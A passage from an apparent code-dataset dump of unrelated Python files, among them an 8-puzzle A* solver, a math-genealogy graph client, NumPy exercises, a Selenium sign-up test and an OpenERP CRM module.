getInvCount(self,arr):\n inv_count = 0\n empty_value = 0\n for i in range(0, 9):\n for j in range(i + 1, 9):\n if arr[i] != empty_value and arr[j] != empty_value and arr[i] > arr[j]:\n inv_count += 1\n return inv_count\n # if given 8 puzzle is solvable.\n def isSolvable(self,puzzle):\n # Count inversions in given 8 puzzle\n inv_count = self.getInvCount([j for sub in puzzle.value for j in sub])\n inv_count_final=self.getInvCount([j for sub in self.final_value for j in sub])\n # return true if inversion count is even.\n return (inv_count % 2 == inv_count_final % 2)\n # Obtain successors\n def get_successors(self,current_state,dist_func):\n # Current state value\n father_node=current_state\n current_state=current_state.value\n # Hole Position\n position_hole=np.where(current_state==0)\n position_hole=list(zip(position_hole[0],position_hole[1]))\n hole=position_hole[0]\n # Available Positions and movements\n available_pos=[0,1,2]\n movements=[hole[0]-1,hole[0]+1,hole[1]-1,hole[1]+1]\n # Build sons\n sons=[]\n # (i,j)->(i-1,j) (up) \n if available_pos.count(movements[0])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[movements[0]][hole[1]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[movements[0]][hole[1]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n # (i,j)->(i+1,j) (down) \n if available_pos.count(movements[1])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[movements[1]][hole[1]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[movements[1]][hole[1]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n # (i,j)->(i,j-1) (leff)\n if available_pos.count(movements[2])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[hole[0]][movements[2]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[hole[0]][movements[2]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n 
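`isSolvable` rests on a parity invariant: on a board of odd width, sliding the blank never changes the inversion parity, so a start layout can reach a goal layout only if both parities agree. The check in stand-alone form, using the record's own example boards:

```python
def inversions(flat):
    """Count pairs that appear in the wrong order, skipping the blank (0)."""
    tiles = [t for t in flat if t != 0]
    return sum(1
               for i in range(len(tiles))
               for j in range(i + 1, len(tiles))
               if tiles[i] > tiles[j])

def reachable(start, goal):
    # Odd board width: blank moves preserve inversion parity.
    return inversions(start) % 2 == inversions(goal) % 2

print(reachable([3, 2, 1, 6, 5, 4, 8, 7, 0],
                [1, 2, 3, 4, 5, 6, 8, 7, 0]))  # True
```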
sons.append(son)\n # (i,j)->(i,j+1) (right)\n if available_pos.count(movements[3])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[hole[0]][movements[3]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[hole[0]][movements[3]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n return sons\n # Deal with repetitions\n def deal_repetitions(self,sons):\n # Open states\n for open_node in self.open_states:\n for state in sons:\n if is_equal(open_node.value,state.value):\n if open_node.cost+open_node.depth>state.cost+state.depth:\n self.open_states.remove(open_node)\n else:\n sons.remove(state)\n #sons.remove(state)\n # Closed states\n for closed_node in self.closed_states:\n for state in sons:\n if is_equal(closed_node.value,state.value):\n \n if closed_node.cost+closed_node.depth>state.cost+state.depth:\n self.closed_states.remove(state)\n #sons.remove(state)\n else:\n sons.remove(state)\n #sons.remove(state)\n return sons\n # Append in list open\n def append_open(self,sons):\n for son in sons:\n self.open_states.append(son)\n # Getting better (from open_states)\n def get_better(self):\n cost=np.array([state.cost+state.depth for state in self.open_states])\n argmin_cost=np.argwhere(cost==np.amin(cost))\n argmin_cost=argmin_cost.reshape(argmin_cost.shape[0])\n if argmin_cost.size==1:\n value=self.open_states[argmin_cost[0]]\n #self.open_states.remove(value)\n return value\n else:\n # First criteria for repetitions is the heuristic distance\n states_argmin_cost=[self.open_states[i] for i in argmin_cost]\n heuristic_value=[state.cost for state in states_argmin_cost]\n argmin_heuristic=np.argwhere(heuristic_value==np.amin(heuristic_value))\n argmin_heuristic=argmin_heuristic.reshape(argmin_heuristic.shape[0])\n if argmin_heuristic.size==1:\n value=states_argmin_cost[argmin_heuristic[0]]\n #self.open_states.remove(value)\n return value\n else:\n # Second criteria for repetitions is the depth\n states_argmin_heuristic=[states_argmin_cost[i] for i in argmin_heuristic]\n depth_value=[state.depth for state in states_argmin_heuristic]\n argmin_depth=np.argwhere(depth_value==np.amin(depth_value))\n argmin_depth=argmin_depth.reshape(argmin_depth.shape[0])\n value=states_argmin_heuristic[argmin_depth[0]]\n #self.open_states.remove(value)\n return value\n # Main function\n def main(self,dist_func):\n if self.isSolvable(self.init_state):\n # Search Algorithm\n current_state=self.init_state\n self.open_states.append(current_state)\n while (not is_equal(current_state.value,self.final_value)) and len(self.open_states)>0:\n self.open_states.remove(current_state)\n self.closed_states.append(current_state)\n if current_state.depth<=DEPTH_MAX:\n sons=self.get_successors(current_state,dist_func)\n sons=self.deal_repetitions(sons)\n if len(sons)>0:\n self.append_open(sons)\n current_state=self.get_better()\n self.final_state=current_state\n self.closed_states.append(self.final_state)\n # Printing solution\n aux=[current_state.value]\n father=current_state.father_node\n while father!=None:\n aux.append(father.value)\n father=father.father_node\n aux.reverse()\n for i in range(len(aux)):\n print_dashboard(aux[i])\n print('\\n')\n print('Numero de movimientos de la solución: %d' %(len(aux)-1))\n print('Numero de nodos visitados: %d' %(len(self.closed_states)))\n print('Numero de nodos por visitar: %d' %(len(list(self.open_states))))\n print('Numero de nodos expandidos: %d' 
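`get_better` rescans the entire open list for the smallest f = g + h, then breaks ties on h and depth. A binary heap keeps the best node at the front in O(log n) per operation; a sketch of that bookkeeping with plain strings standing in for node objects:

```python
import heapq
import itertools

counter = itertools.count()  # tiebreaker so the heap never compares payloads
open_heap = []

def push(state, g, h):
    heapq.heappush(open_heap, (g + h, h, next(counter), state))

def pop_best():
    f, h, _, state = heapq.heappop(open_heap)
    return state

push("start", g=0, h=7)
push("child", g=1, h=4)
print(pop_best())  # child, since f = 5 beats f = 7
```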
%(len(self.closed_states)+len(list(self.open_states))))\n else:\n print('No se puede alcanzar el nodo final')\n\n#-------#\n# Proof #\n#-------#\n'''\ninit_value=np.array([[3,2,1],[6,5,4],[8,7,0]])\nfinal_value=np.array([[1,2,3],[4,5,6],[8,7,0]])\n\nA_star_1=A_star(init_value,final_value,Inversion_dist)\nA_star_1.main(Inversion_dist)\n'''\n\n","repo_name":"robervz22/IA-y-TC","sub_path":"Tarea-3-IA/heuristic_search.py","file_name":"heuristic_search.py","file_ext":"py","file_size_in_byte":11047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36910405923","text":"from .output.dot import DotOutput\nfrom .output.identity import IdentityOutput\nfrom .types import Geneagraph\n\nfrom argparse import ArgumentParser, FileType\nimport asyncio\nfrom importlib.metadata import PackageNotFoundError, version\nimport json\nimport platform\nimport textwrap\nfrom typing import (\n Any,\n Dict,\n List,\n Literal,\n Protocol,\n Type,\n TypedDict,\n Union,\n cast,\n)\nimport re\nimport sys\nimport websockets\nimport websockets.client\n\n\nGGRAPHER_URI = \"wss://ggrphr.davidalber.net\"\nTEXTWRAP_WIDTH = 79\n\n\nclass OutputFormatter(Protocol):\n \"\"\"This defines an interface that output classes must implement.\"\"\"\n\n def __init__(self, graph: Geneagraph) -> None:\n ...\n\n @property\n def output(self) -> str:\n \"\"\"Return the graph's formatted output.\"\"\"\n ...\n\n\nclass StartNodeRequest(TypedDict):\n recordId: int\n getAdvisors: bool\n getDescendants: bool\n\n\nclass RequestPayload(TypedDict):\n kind: Literal[\"build-graph\"]\n options: Dict[Literal[\"reportingCallback\"], bool]\n startNodes: List[StartNodeRequest]\n\n\nclass ProgressCallback(TypedDict):\n queued: int\n fetching: int\n done: int\n\n\nclass GgrapherError(Exception):\n def __init__(self, msg: str, *, extra: Dict[str, str] = {}) -> None:\n self.msg = msg\n self.extra = extra\n\n def __str__(self) -> str:\n ret_arr = [\n textwrap.fill(self.msg, width=TEXTWRAP_WIDTH),\n \"\",\n textwrap.fill(\n \"If this problem persists, please create an issue at \\\nhttps://github.com/davidalber/geneagrapher/issues/new, and include the following in \\\nthe issue body:\",\n width=TEXTWRAP_WIDTH,\n ),\n ]\n\n # For the key-value arguments, determine the length of the\n # longest key and use that information to align the columns.\n extras_width = (\n max([len(k) for k in [\"Message\", \"Command\"] + list(self.extra.keys())]) + 2\n ) # The 2 is for \": \"\n\n ret_arr.append(f\"\\n {'Message:':{extras_width}}{self.msg}\")\n ret_arr.append(f\" {'Command:':{extras_width}}{' '.join(sys.argv)}\")\n\n for k, v in self.extra.items():\n key = f\"{k}:\"\n ret_arr.append(f\" {key:{extras_width}}{v}\")\n\n return \"\\n\".join(ret_arr)\n\n\nclass StartNodeArg:\n def __init__(self, val: str) -> None:\n # Validate the input.\n match = re.fullmatch(r\"(\\d+)(:(a|d|ad|da))\", val)\n if match is None:\n raise ValueError()\n self.record_id = int(match.group(1))\n\n self.request_advisors = \"a\" in (match.group(2) or [])\n self.request_descendants = \"d\" in (match.group(2) or [])\n\n # If no traverse direction was specified, default to advisors.\n if not self.request_advisors and not self.request_descendants:\n self.request_advisors = True\n\n @property\n def start_node(self) -> StartNodeRequest:\n return {\n \"recordId\": self.record_id,\n \"getAdvisors\": self.request_advisors,\n \"getDescendants\": self.request_descendants,\n }\n\n\ndef make_payload(start_nodes: List[StartNodeArg], quiet: bool) -> 
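`StartNodeArg` parses specs like `123:ad` with a regex, but as written the `(:(a|d|ad|da))` group is mandatory, so a bare ID is rejected even though the surrounding code defaults to advisors when no direction is given. A sketch with the suffix made optional (my reading of the intent, not a patch to the package):

```python
import re

def parse_start_node(val: str) -> dict:
    match = re.fullmatch(r"(\d+)(?::(a|d|ad|da))?", val)
    if match is None:
        raise ValueError(f"bad start node spec: {val!r}")
    flags = match.group(2) or "a"  # no suffix: advisors only
    return {
        "recordId": int(match.group(1)),
        "getAdvisors": "a" in flags,
        "getDescendants": "d" in flags,
    }

print(parse_start_node("30484:ad"))
print(parse_start_node("30484"))  # defaults to advisor traversal
```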
RequestPayload:\n return {\n \"kind\": \"build-graph\",\n \"options\": {\"reportingCallback\": not quiet},\n \"startNodes\": [sn.start_node for sn in start_nodes],\n }\n\n\ndef display_progress(queued: int, doing: int, done: int) -> None:\n prefix = \"Progress: \"\n size = 60\n count = queued + doing + done\n\n x = int(size * done / count)\n y = int(size * doing / count)\n\n print(\n f\"{prefix}[{u'█'*x}{u':'*y}{('.'*(size - x - y))}] {done}/{count}\",\n end=\"\\r\",\n file=sys.stderr,\n flush=True,\n )\n\n\nasync def get_graph(payload: RequestPayload) -> Geneagraph:\n def intify_record_keys(d: Dict[Any, Any]) -> Dict[Any, Any]:\n \"\"\"JSON object keys are strings, but the Geneagraph type\n expects the keys of the nodes object to be integers. This\n function converts those keys to ints during deserialization.\n \"\"\"\n if \"nodes\" in d:\n ret = {k: v for k, v in d.items() if k != \"nodes\"}\n ret[\"nodes\"] = {int(k): v for k, v in d[\"nodes\"].items()}\n return ret\n\n return d\n\n try:\n async with websockets.client.connect(\n GGRAPHER_URI,\n user_agent_header=f\"Python/{platform.python_version()} \\\nGeneagrapher/{get_version()}\",\n ) as ws:\n await ws.send(json.dumps(payload))\n while True:\n response_json = await ws.recv()\n response = json.loads(response_json, object_hook=intify_record_keys)\n response_payload: Union[\n Geneagraph, ProgressCallback, None\n ] = response.get(\"payload\")\n\n if response[\"kind\"] == \"graph\":\n return cast(Geneagraph, response_payload)\n elif response[\"kind\"] == \"progress\":\n progress = cast(ProgressCallback, response_payload)\n display_progress(\n progress[\"queued\"], progress[\"fetching\"], progress[\"done\"]\n )\n else:\n raise GgrapherError(\n \"Request to Geneagrapher backend failed.\",\n extra={\"Response\": str(response_json)},\n )\n except websockets.exceptions.WebSocketException:\n raise GgrapherError(\"Geneagrapher backend is currently unavailable.\")\n\n\ndef get_formatter(format: Literal[\"dot\", \"json\"], graph: Geneagraph) -> OutputFormatter:\n format_map: Dict[str, Type[OutputFormatter]] = {\n \"dot\": DotOutput,\n \"json\": IdentityOutput,\n }\n return format_map[format](graph)\n\n\ndef get_version() -> str:\n try:\n return version(\"geneagrapher\")\n except PackageNotFoundError:\n return \"dev\"\n\n\ndef run() -> None:\n description = 'Create a Graphviz \"dot\" file for a mathematics \\\ngenealogy, where ID is a record identifier from the Mathematics Genealogy \\\nProject.'\n parser = ArgumentParser(description=description)\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n choices=(\"dot\", \"json\"),\n default=\"dot\",\n help=\"graph output format (default: dot)\",\n )\n parser.add_argument(\n \"-o\",\n \"--out\",\n dest=\"outfile\",\n help=\"write output to FILE [default: stdout]\",\n type=FileType(\"w\"),\n metavar=\"FILE\",\n default=sys.stdout,\n )\n parser.add_argument(\n \"-q\",\n \"--quiet\",\n action=\"store_true\",\n default=False,\n help=\"do not display the progress bar\",\n )\n parser.add_argument(\n \"--version\", action=\"version\", version=f\"%(prog)s {get_version()}\"\n )\n parser.add_argument(\n \"ids\",\n metavar=\"ID\",\n type=StartNodeArg,\n nargs=\"+\",\n help=\"mathematician record ID; valid formats are 'ID:a' for advisor \\\ntraversal, 'ID:d' for descendant traversal, or 'ID:ad' for advisor and descendant \\\ntraversal\",\n )\n\n args = parser.parse_args()\n payload = make_payload(args.ids, args.quiet)\n\n async def build_graph() -> None:\n graph = await get_graph(payload)\n\n if not args.quiet:\n 
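`display_progress` renders a fixed-width bar in place by ending every print with a carriage return, using '█' for finished work and ':' for in-flight requests. The same routine isolated as a reusable sketch:

```python
import sys

def progress_bar(queued, doing, done, size=60):
    total = queued + doing + done
    filled = int(size * done / total)
    active = int(size * doing / total)
    bar = "█" * filled + ":" * active + "." * (size - filled - active)
    # "\r" rewinds to the line start so the next call overwrites the bar.
    print(f"Progress: [{bar}] {done}/{total}", end="\r",
          file=sys.stderr, flush=True)

for done in (0, 25, 50):
    progress_bar(queued=50 - done, doing=0, done=done)
print(file=sys.stderr)  # final line break once the bar is complete
```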
# Output a line break to end the progress bar.\n print(file=sys.stderr)\n\n formatter: OutputFormatter = get_formatter(args.format, graph)\n print(formatter.output, file=args.outfile)\n\n try:\n asyncio.run(build_graph())\n except GgrapherError as e:\n print(e, file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"davidalber/geneagrapher","sub_path":"geneagrapher/geneagrapher.py","file_name":"geneagrapher.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"19280993226","text":"# GRADED FUNCTION: sigmoid\n\nimport math\n\nimport numpy as np\n\n# example of np.exp\nx = np.array([1, 2, 3])\nprint(np.exp(x)) # result is (exp(1), exp(2), exp(3))\n\n# example of vector operation\nx = np.array([1, 2, 3])\nprint (x + 3)\n\ndef sigmoid(x):\n\n s = 1/(1+np.exp(-x))\n \n return s\n\nx = np.array([1, 2, 3])\nsigmoid(x)\n\n# GRADED FUNCTION: sigmoid_derivative\n\ndef sigmoid_derivative(x):\n\n s = 1/(1+np.exp(-x))\n ds = s*(1-s)\n \n return ds\n\nx = np.array([1, 2, 3])\nprint (\"sigmoid_derivative(x) = \" + str(sigmoid_derivative(x)))\n\n# GRADED FUNCTION: image2vector\ndef image2vector(image):\n\n v = image.reshape((image.shape[0]*image.shape[1]*image.shape[2],1))\n \n return v\n\n#import numpy as np\nimage = np.array([[[ 0.67826139, 0.29380381],\n [ 0.90714982, 0.52835647],\n [ 0.4215251 , 0.45017551]],\n\n [[ 0.92814219, 0.96677647],\n [ 0.85304703, 0.52351845],\n [ 0.19981397, 0.27417313]],\n\n [[ 0.60659855, 0.00533165],\n [ 0.10820313, 0.49978937],\n [ 0.34144279, 0.94630077]]])\n\nprint (\"image2vector(image) = \" + str(image2vector(image)))\n\n# GRADED FUNCTION: normalizeRows\ndef normalizeRows(x):\n\n # Compute x_norm as the norm 2 of x.\n x_norm = np.linalg.norm(x,axis=1,keepdims = True)\n print(x_norm.shape)\n # Divide x by its norm.\n x = x/x_norm\n\n return x\n\nx = np.array([\n [0, 3, 4],\n [1, 6, 4]])\nprint(\"normalizeRows(x) = \" + str(normalizeRows(x)))\n\n# GRADED FUNCTION: softmax\n\ndef softmax(x):\n\n # Apply exp() element-wise to x. 
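The `softmax` exercise above exponentiates raw scores, which overflows `np.exp` for large inputs. The standard stabilization (not part of the original assignment) subtracts each row's maximum first; the output is unchanged because softmax is shift-invariant per row:

```python
import numpy as np

def softmax_stable(x):
    shifted = x - np.max(x, axis=1, keepdims=True)  # largest entry becomes 0
    e = np.exp(shifted)
    return e / np.sum(e, axis=1, keepdims=True)

x = np.array([[9, 2, 5, 0, 0], [7, 5, 0, 0, 0]], dtype=float)
print(np.allclose(softmax_stable(x), softmax_stable(x + 1000)))  # True
```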
Use np.exp(...).\n x_exp = np.exp(x)\n\n x_sum = np.sum(x_exp,axis=1,keepdims = True)\n \n # Compute softmax(x) by dividing x_exp by x_sum.\n s = x_exp/x_sum\n \n return s\n\nx = np.array([[9, 2, 5, 0, 0],[7, 5, 0, 0 ,0]])\nprint(\"softmax(x) = \" + str(softmax(x)))\n\nimport time\n\nx1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]\nx2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]\n\n### CLASSIC DOT PRODUCT OF VECTORS IMPLEMENTATION ###\ntic = time.process_time()\ndot = 0\nfor i in range(len(x1)):\n dot+= x1[i]*x2[i]\ntoc = time.process_time()\nprint (\"dot = \" + str(dot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### CLASSIC OUTER PRODUCT IMPLEMENTATION ###\ntic = time.process_time()\nouter = np.zeros((len(x1),len(x2))) # we create a len(x1)*len(x2) matrix with only zeros\nfor i in range(len(x1)):\n for j in range(len(x2)):\n outer[i,j] = x1[i]*x2[j]\ntoc = time.process_time()\nprint (\"outer = \" + str(outer) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### CLASSIC ELEMENTWISE IMPLEMENTATION ###\ntic = time.process_time()\nmul = np.zeros(len(x1))\nfor i in range(len(x1)):\n mul[i] = x1[i]*x2[i]\ntoc = time.process_time()\nprint (\"elementwise multiplication = \" + str(mul) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### CLASSIC GENERAL DOT PRODUCT IMPLEMENTATION ###\nW = np.random.rand(3,len(x1)) # Random 3*len(x1) numpy array\ntic = time.process_time()\ngdot = np.zeros(W.shape[0])\nfor i in range(W.shape[0]):\n for j in range(len(x1)):\n gdot[i] += W[i,j]*x1[j]\ntoc = time.process_time()\nprint (\"gdot = \" + str(gdot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\nx1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]\nx2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]\n\n### VECTORIZED DOT PRODUCT OF VECTORS ###\ntic = time.process_time()\ndot = np.dot(x1,x2)\ntoc = time.process_time()\nprint (\"dot = \" + str(dot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### VECTORIZED OUTER PRODUCT ###\ntic = time.process_time()\nouter = np.outer(x1,x2)\ntoc = time.process_time()\nprint (\"outer = \" + str(outer) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### VECTORIZED ELEMENTWISE MULTIPLICATION ###\ntic = time.process_time()\nmul = np.multiply(x1,x2)\ntoc = time.process_time()\nprint (\"elementwise multiplication = \" + str(mul) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### VECTORIZED GENERAL DOT PRODUCT ###\ntic = time.process_time()\ndot = np.dot(W,x1)\ntoc = time.process_time()\nprint (\"gdot = \" + str(dot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n# GRADED FUNCTION: L1\n\ndef L1(yhat, y):\n \"\"\"\n loss -- the value of the L1 loss function defined above\n \"\"\"\n\n loss = np.sum(np.abs(y - yhat))\n \n return loss\n\nyhat = np.array([.9, 0.2, 0.1, .4, .9])\ny = np.array([1, 0, 0, 1, 1])\nprint(\"L1 = \" + str(L1(yhat,y)))\n\n# GRADED FUNCTION: L2\n\ndef L2(yhat, y):\n \"\"\"\n loss -- the value of the L2 loss function defined above\n \"\"\"\n loss = np.dot((y - yhat).T,(y - yhat))\n \n return loss\n\nyhat = np.array([.9, 0.2, 0.1, .4, .9])\ny = np.array([1, 0, 0, 1, 1])\nprint(\"L2 = \" + str(L2(yhat,y)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Leoricking/Neural-Network","sub_path":"1.Python Basics With Numpy/Python Basics With Numpy.py","file_name":"Python Basics With 
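The `process_time` comparisons above time a single run, which is noisy for microsecond-scale work. `timeit` repeats the call and averages; a sketch of the dot-product case:

```python
import timeit
import numpy as np

x1 = np.random.rand(1000)
x2 = np.random.rand(1000)

loop_t = timeit.timeit(lambda: sum(a * b for a, b in zip(x1, x2)), number=200)
vec_t = timeit.timeit(lambda: np.dot(x1, x2), number=200)
print(f"python loop: {1000 * loop_t:.2f} ms, np.dot: {1000 * vec_t:.2f} ms")
```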
Numpy.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21533139240","text":"# https://www.acmicpc.net/problem/1292\n\na,b = map(int,input().split())\n \narr = [0]\nfor i in range(46):\n for j in range(i):\n arr.append(i)\n \nprint(sum(arr[a:b+1]))\n","repo_name":"1c0332zz/TIL","sub_path":"Judge/Baekjoon/20220728/1292_쉽게 푸는 문제.py","file_name":"1292_쉽게 푸는 문제.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26911223998","text":"from week7.steps.webdriver_functions import *\nfrom selenium.webdriver.support.select import Select\n\n\nsign_in_link = \"//a[@class='login']\"\nemail_input = \"//input[@id='email_create']\"\ncreate_an_account_button = \"//form[@id='create-account_form']//span[1]\"\npassword_input = \"//input[@id='passwd']\"\ntitle_input = \"//input[@id='id_gender2']\"\nfirst_name_button =\"//input[@id='customer_firstname']\"\nlast_name_button =\"//input[@id='customer_lastname']\"\ndate_of_birth_day = \"//select[@id='days']\"\ndate_of_birth_month = \"//select[@id='months']\"\ndate_of_birth_year = \"//select[@id='years']\"\naddress_input = \"//input[@id='address1']\"\ncity_input = \"//input[@id='city']\"\nzip_code_input = \"//input[@id='postcode']\"\nphone_input = \"//input[@id='phone_mobile']\"\nregister_input = \"//span[contains(text(),'Register')]\"\nsign_out_link = \"//a[@class='logout']\"\n\n#Scenario 1\n# 1. Open automationpractice.com website\n# 2. Enter email to create a new account\n# 3. Click on \"Create an account\"\n\nlaunch_website(\"http://automationpractice.com/index.php\")\n\nclick_element_by_xpath(sign_in_link)\nenter_text_by_xpath(email_input, \"1724@email.com\")\nclick_element_by_xpath(create_an_account_button)\ntime.sleep(5)\n\n# Scenario 2\n# 1. Find all elements (xpathe, id, name)\n# 2. Input/select all required fields (your personal information)\n# 3. Click \"register\" button.\n\nclick_element_by_xpath(title_input)\ntime.sleep(2)\nenter_text_by_xpath(first_name_button, \"Nadia\")\ntime.sleep(2)\nenter_text_by_xpath(last_name_button, \"Z\")\ntime.sleep(2)\nenter_text_by_xpath(password_input, \"Nadia3!\")\ntime.sleep(2)\n\ndd_days = Select(driver.find_element_by_id(\"days\"))\ndd_days.select_by_value('3')\ntime.sleep(2)\n\ndd_months = Select(driver.find_element_by_id(\"months\"))\ndd_months.select_by_value('10')\ntime.sleep(2)\n\ndd_years = Select(driver.find_element_by_id(\"years\"))\ndd_years.select_by_value('1983')\ntime.sleep(2)\n\nenter_text_by_xpath(address_input, \"189 Bay 23 St\")\nenter_text_by_xpath(city_input, \"Brooklyn\")\ntime.sleep(2)\n\nselect = Select(driver.find_element_by_id(\"id_state\"))\nselect.select_by_visible_text('New York')\n\nenter_text_by_xpath(zip_code_input, \"11214\")\ntime.sleep(2)\n\nenter_text_by_xpath(phone_input, \"1234567890\")\nclick_element_by_xpath(register_input)\ntime.sleep(5)\n\n# Scenario 3\n# 1. Verify that account is created by message\n# 2. Log out\n# 3. 
Close the browser\n\nheading_xpath = \"//span[contains(text(),'Nadia Z')]\"\nelement = driver.find_element_by_xpath(heading_xpath)\nassert \"Nadia Z\" in element.text\nprint(\"Your account is successfully created.\")\n\nclick_element_by_xpath(sign_out_link)\nprint(\"Logging out now...\")\n\nclose_browser()\n\n\n","repo_name":"NadiyaZelman/gitproject1","sub_path":"myweek6/class_project1.py","file_name":"class_project1.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71604514728","text":"import pytest\nfrom polytropos.ontology.variable import Text\nfrom polytropos.ontology.variable.__primitive import EIN\n\n@pytest.mark.parametrize(\"original, expected\", [\n (None, None),\n (\"\", \"\"),\n (\"/El Niño/\", \"el-ni%C3%B1o\"),\n (\"I'm a little \\\"teapot\\\", 'short' & stout.\", \"im-a-little-teapot-short-and-stout\"),\n (\"#yolo\", \"yolo\"),\n (\"Everyone was rude; Paris vacation\", \"everyone-was-rude-paris-vacation\"),\n (\"Mission: Impossible\", \"mission-impossible\"),\n (\"snake_case\", \"snake-case\"),\n (\"Either/or\", \"either-or\"),\n (\"(parenthesized)\", \"parenthesized\"),\n (\".net\", \"net\")\n])\ndef test_sanitize_text(original: str, expected: str) -> None:\n actual: str = Text.sanitize(original)\n assert actual == expected\n\n@pytest.mark.parametrize(\"original, expected\", [\n (\"012345678\", \"012345678\"),\n (\"01-2345678\", \"012345678\"),\n (\" 012345678 \", \"012345678\"),\n (\" -0-1-2-3-4-5-6-7-8- \", \"012345678\"),\n (\"abcdefghi\", \"abcdefghi\"),\n (\"abcdefghi\", \"abcdefghi\"),\n (\"12345678\", \"012345678\"),\n (\"bcdefghi\", \"bcdefghi\"),\n (\"00000008\", \"000000008\"),\n (\"8\", \"8\"),\n])\ndef test_sanitize_ein(original: str, expected: str) -> None:\n actual: str = EIN.sanitize(original)\n assert actual == expected\n\n@pytest.mark.parametrize(\"original, expected\", [\n (\"012345678\", \"01-2345678\"),\n (\"01-2345678\", \"01-2345678\"),\n (\" 012345678 \", \"01-2345678\"),\n (\" -0-1-2-3-4-5-6-7-8- \", \"01-2345678\"),\n (\"abcdefghi\", \"\"),\n (\"abcdefghi\", \"\"),\n (\"12345678\", \"01-2345678\"),\n (\"bcdefghi\", \"\"),\n (\"00000008\", \"00-0000008\"),\n (\"8\", \"\"),\n])\ndef test_display_format_ein(original: str, expected: str) -> None:\n actual: str = EIN.display_format(original)\n assert actual == expected\n","repo_name":"borenstein/polytropos","sub_path":"test/test_unit/ontology/variable/test_sanitize.py","file_name":"test_sanitize.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"4359544402","text":"from openerp.osv import osv, fields\nimport logging\n_logger = logging.getLogger(__name__)\nfrom openerp.tools.translate import _\n\n\nclass sale_crm_lead(osv.Model):\n _inherit = 'crm.lead'\n\n def create(self, cr, uid, vals, context=None):\n res = super(sale_crm_lead, self).create(cr, uid, vals, context=context)\n lead = self.browse(cr, uid, res)\n #Issue139\n ir_model_data = self.pool.get('ir.model.data')\n if lead.user_id and lead.user_id.email:\n try:\n template_id = ir_model_data.get_object_reference(cr, uid, 'crm_claim_enhance', 'email_template_crm_lead_notify')[1]\n if template_id:\n template_obj = self.pool.get('email.template')\n mail_id = template_obj.send_mail(cr, uid, template_id, res, True)\n except ValueError:\n template_id = False\n return res\n\nsale_crm_lead()\n\nclass crm_claim(osv.Model):\n _inherit = 'crm.claim'\n\n 
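The registration script above paces itself with `time.sleep`, which either wastes time or still races the page. Selenium's explicit waits block only until a condition holds; a sketch of the first step (assumes a local Chrome and the same demo site):

```python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Chrome()
driver.get("http://automationpractice.com/index.php")
wait = WebDriverWait(driver, timeout=10)

# Proceed the moment the field is interactable instead of sleeping blindly.
email = wait.until(EC.element_to_be_clickable((By.ID, "email_create")))
email.send_keys("1724@email.com")
driver.quit()
```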
def _parts_cost(self, cursor, user, ids, name, arg, context=None):\n res = {}\n for claim in self.browse(cursor, user, ids, context=context):\n res[claim.id] = 0\n for pro in claim.parts_code:\n res[claim.id] += pro.standard_price;\n return res\n\n '''\n def _qc_manager(self, cursor, user, ids, name, arg, context=None):\n res = {}\n for claim in self.browse(cursor, user, ids, context=context):\n res[claim.id] = 'null'\n if claim.type == 'Warranty' and claim.sale_id:\n qc_manager_ids = []\n for line in claim.sale_id.order_line:\n if line.product_id.qc_manager:\n qc_manager_ids.append(str(line.product_id.qc_manager.id))\n res[claim.id] = ','.join(set(qc_manager_ids))\n return res\n '''\n\n _columns = {\n #Issue256\n 'parts_code':fields.many2many('product.product', 'claim_partproduct','claim_id','product_id',string='Parts Code'),\n 'parts_cost': fields.function(\n _parts_cost,\n string='Parts Cost',\n type='float',\n #store=True\n ),\n 'fixing_cost': fields.float('Fixing 